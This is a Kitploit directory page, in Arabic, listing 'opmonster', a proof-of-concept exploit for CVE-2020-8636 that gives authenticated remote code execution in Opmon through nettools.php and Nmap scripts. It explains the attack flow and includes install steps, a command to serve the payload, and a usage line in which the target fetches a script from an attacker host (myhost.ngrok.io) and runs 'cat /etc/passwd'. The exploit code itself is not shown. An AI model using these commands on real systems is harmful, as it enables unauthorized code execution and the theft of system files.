Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/phor3nsic/opmonster
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubphor3nsic/opmonster

opmonster

استغلال CVE-2020-8636 لتنفيذ التعليمات البرمجية عن بُعد مع المصادقة في Opmon

عرض المستودع
22منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

OpMonster

CVE-2020-8636 — استغلال تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة لـ Opmon

حول • التثبيت • الاستخدام • الترخيص

language last commit license stars

OpMonster

حول

OpMonster هو استغلال لإثبات المفهوم لـ CVE-2020-8636، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في منصة مراقبة Opmon. يستغل نقطة النهاية nettools.php، التي تتيح لك تشغيل Nmap مع خيارات --script عشوائية. يجعل الاستغلال Opmon يجلب سكربت Nmap خبيثًا بامتداد من خادم تتحكم فيه (عبر )، ويضعه في ، ثم يشغّله لتنفيذ أمرك على الهدف ويطبع المخرجات.

.nse
http-fetch
/tmp

اكتشفه وطوّره @phor3nsic. مزيد من التفاصيل: ثلاث ثغرات CVE في Opmon.

التثبيت

root@kitploit:~
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests

الاستخدام

أولاً، شغّل خادم ويب على مضيف يمكن للهدف الوصول إليه، في دليل يمكن من خلاله تنزيل سكربت .nse المُنشأ (يكتب الاستغلال السكربت في الدليل الحالي):

root@kitploit:~
php -S 0.0.0.0:1337

ثم شغّل الاستغلال مع أربع وسائط موضعية:

root@kitploit:~
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
الوسيطالوصف
HOSTرابط Opmon الأساسي للهدف (مثل https://vulnhost.com)
LHOSTمضيف الخادم الخاص بك الذي يقدّم سكربت .nse
LPORTمنفذ الخادم الخاص بك
CMDالأمر المطلوب تنفيذه على الهدف

يتوقف الاستغلال عن العمل مع رسالة إذا لم يقم الهدف بتنزيل السكربت ("غير معرض للخطر") أو لم يتمكن من إنشاء اتصال صادر إلى خادمك.

إخلاء مسؤولية

لأغراض الاختبارات الأمنية المصرح بها والتعليم فقط. أنت مسؤول عن كيفية استخدامك له.

الترخيص

MIT © phor3nsic

تنزيل الأداة